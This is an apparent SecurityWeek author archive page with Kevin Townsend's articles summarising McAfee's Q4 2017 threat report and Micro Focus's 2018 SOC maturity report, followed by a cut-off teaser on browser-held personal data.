Author Archives: Kevin Townsend

Usual Threats, But More Sophisticated and Faster: Report

Posted on by

Almost Every Type of Cyber Attack is Increasing in Both Volume and Sophistication

Eight new malware samples were recorded every second during the final three months of 2017. The use of fileless attacks, primarily via PowerShell, grew; and there was a surge in cryptocurrency hijacking malware.

These were the primary threats outlined in the latest McAfee Lab’s Threat Report (PDF) covering Q4 2017.

The growth of cryptomining malware coincided with the surge in Bitcoin value, which peaked at just under $20,000 on Dec. 22. With the cost of dedicated mining hardware at upwards of $5,000 per machine, criminals chose to steal users’ CPU time via malware. It demonstrates how criminals always follow the money, and choose the least expensive method of acquiring it with the greatest chance of avoiding detection.

Since December, Bitcoin’s value has fallen to $9,000 (at the time of publishing). Criminals’ focus on Bitcoin is likewise being modified, with Ethereum and Monero becoming popular. Last week, Microsoft discovered a major campaign focused on stealing Electroneum. “We currently see discussions in underground forums that suggest moving from Bitcoin to Litecoin because the latter is a safer model with less chance of exposure,” comments Raj Samani, chief scientist and McAfee fellow with the Advanced Threat Research Team.

The speed with which criminals adapt to their latest market conditions is also seen in the way they maximize their asymmetric advantage. “Adversaries,” writes Samani, “have the luxury of access to research done by the technical community, and can download and use opensource tools to support their campaigns, while the defenders’ level of insight into cybercriminal activities is considerably more limited, and identifying evolving tactics often must take place after malicious campaigns have begun.”

Examples of attackers making use of legitimate research include Fancy Bear (APT28) leveraging a Microsoft Office Dynamic Data Exchange technique in November 2017 that had been made public just a few weeks earlier. The hackers used it in a phishing campaign that cited the New York City terror attacks. A second example comes from the December Gold Dragon attacks on organizations involved with the Winter Olympics. In this case the attackers employed steganography, “and a new tool released days before the attack.”

The speed of changing tactics and adopting new techniques is in sharp contrast to the delays inherent in defending against new vulnerabilities — with the two-months plus failure of Equifax to patch all of its systems with the Apache Struts patch being a prime example.

Healthcare organizations remained a significant target throughout 2017, with a 210% increase in publicly disclosed incidents, year on year — although figures declined 78% in Q4. McAfee’s research conclusion is that many of the incidents were caused by failures to comply with security best practices or to address vulnerabilities in medical software.

Botnets are a continuing problem. However, in Q4 2017, just two botnets, Necurs and Gamut, accounted for 97% of all spam botnet traffic. Gamut was responsible for delivering job offer-themed phishing (and possible money mule recruitment), in English, German, and Italian; while Necurs delivered ‘lonely girl’ spam, pump and dump stock spam, and Locky ransomware downloaders.

New ransomware detections grew consistently throughout 2017, culminating in more than 2,000,000 detections in Q4 (compared to less than 500,000 in Q4, 2016). “A big contributor to ransomware growth was Ransom:Win32/Genasom (also known as Stampado, with variants such as ‘Philadelphia‘). This family provides an inexpensive entree for cyber criminals, being offered for sale as low as $39 for a lifetime license. 

Ransomware didn’t merely increase in volume (59% year on year, and 35% in Q4 alone), it also diversified beyond just extorting money. “Actors devised strategies to create ‘smoke and mirrors’ by distracting defenders from actual attacks,” writes Samani, “such as the emergence of pseudoransomware, seen in NotPetya and a Taiwan bank heist.”

The big takeaway from the latest McAfee Lab’s Threat Report is that the cybersecurity threat landscape is continuing to worsen. Just about every type of attack is increasing in both volume and sophistication. The increasing use of PowerShell and JavaScript to avoid malicious file detection is just one example. In Q1 2016 there were around 2000 detections. By Q4 2017, this had grown to just under 48,000 — boosted “by a rash of downloaders in Q4”.

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.

sponsored links

Continue reading Usual Threats, But More Sophisticated and Faster: Report

SOC Performance Improves, But Remains Short of Optimum: Report

Posted on by

The good news is that security operations centers (SOCs) are becoming more efficient. The not-so-good news is that there is still considerable scope for improvement.

This is the conclusion of the fifth annual Micro Focus State of Security Operations Report for 2018 (PDF), which draws on the experience of 200 assessments of 144 discreet SOC organizations in 33 countries. In greater detail, there has been an overall 12% improvement in SOC maturity — the most significant shift yet in the five years of the survey. Despite this, the median SOC maturity level stands at just 1.42 across all industries; significantly below the Micro Focus recommended target of 3.0,

The report uses the Micro Focus Security Operations Maturity Model (SOMM) methodology for assessments. This is based on the Carnegie Mellon Software Engineering Institute Capability Maturity Model for Integration (SEI-CMMI), which has been updated by Micro Focus at regular intervals to remain relevant with current information security trends and threat capabilities. 

SOMM evaluates SOCs on the basis of people and processes, technology, and business capabilities. Despite the remaining room for improvement, this year’s results show that organizations are beginning to see a return on their security investments and are seeing more value out of the security solutions they have deployed.

“Over the last five years, we have watched organizations attempt to achieve a complete security transformation by applying Band-Aids – such as the purchase of peripheral products or dismantling of solutions – only to find poor results and poor business alignment,” said Matthew Shriner, vice president, Security Professional Services for Micro Focus. “With that in mind, it is refreshing that when it comes to cyber defense capability, Micro Focus is seeing a much higher degree of operational sophistication than ever before. Nearly 25% of organizations assessed are meeting business goals, representing a nearly 10% year-over-year improvement.”

The SOMM gives a rating between 0 and 5. ‘0’ represents a complete lack of capability, while ‘5’ is given for a capability that is consistent, repeatable, documented, measured, tracked, and continually improved upon. Micro Focus believes that enterprises should seek a maturity level of 3, while managed security service providers should target a level between 3 and 4. The reliable detection of malicious activity, and a systematic approach to managing that activity are considered to be the most important success criteria for mature cyber defense. 

Despite the overall improvement in maturity levels, the report notes that “20 percent of cyber defense organizations that were assessed over the past 5 years failed to score a security operations maturity model (SOMM) level 1. These organizations continue to operate in an ad-hoc manner with undocumented processes and significant gaps in security and risk management.”

Geographically, the top performing areas are South America (SOMM score of 1.89) and the Benelux countries (1.79). In both cases the report suggests this may be down to a continuing trend “toward the use of niche service providers with a high degree of maturity, and initial investment by new service provider organizations entering the market. Niche provider SOC organizations in those regions are often willing to deliver a highly customized service to their customers and are starting to explore Hunt-as-a-Service offerings as part of their services portfolio.”

The UK and DACH countries (Germany, Austria and Switzerland) all showed improvement — 17% for the former and 9% for the latter. “Analysis,” notes the report, “revealed multinational organizations making security investments in preparation for the General Data Protection Regulation (GDPR) which is currently scheduled to become enforceable in May of 2018. The consolidation and relocation of SOCs within the EMEA regions to form Security Fusion Centers have also improved the effectiveness of security operations.”

North American SOCs showed only a limited improvement of 1%; but that follows a major improvement of 34% last — and at 1.53, it remains ahead of the UK’s 1.47. “Security operations teams in North America,” says the report, “once again led as the region most willing to undergo external evaluations of their cyber defense capability and experienced accelerated results based on the implementation of targeted roadmaps.”

Cloud migration has proven a problem for many SOCs. In most organizations, the cloud strategy focuses on application functionality without accounting for security and logging requirements. “Plans to monitor,” notes the report, “did not follow key assets to the cloud for most security operations centers, leaving these SOCs with visibility only into the functionality that remained within legacy data center space.”

In 2015, Micro Focus noted that organizations had begun to invest in big data lakes and analytics. By 2017, assessments showed that some SOCs are performing successful analytics, usually mining historical data for TTPs and IoCs — but, “for the majority of organizations assessed such investments continue to be a science experiment with an uncertain future.”

The use of deception grids continues to grow. The purpose is to increase the cost of an attack by tricking the attacker into deploying resources that are ineffective; while simultaneously learning about both the attacker and his intentions. Micro Focus expects this practice to grow, and will monitor the use of deception grids and their effect on SOC maturity in future years.

Overall, Micro Focus is optimistic over SOC progress in 2017, but warns that SOCs are no quick fix for security. “Successful security operations programs require an assessment of the risk management, security, and compliance objectives of the organization and the active tuning of the solutions deployed.”

RelatedWhat Makes an Effective SOC is Evolving 

Related: It’s Time to Implement SOC 2.0 

Related: SOCs Suffer Under Volume of Data, Alerts: Report 

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.

sponsored links

Continue reading SOC Performance Improves, But Remains Short of Optimum: Report

Exploiting the User PII Held in Everyone’s Web Browser

Posted on by

Browsers are the single most used application today. Everyone uses at least one browser, whether in the office or at home. But not everyone realizes just how much personal data is left hanging around inside their browsers; nor how easy it is for third-… Continue reading Exploiting the User PII Held in Everyone’s Web Browser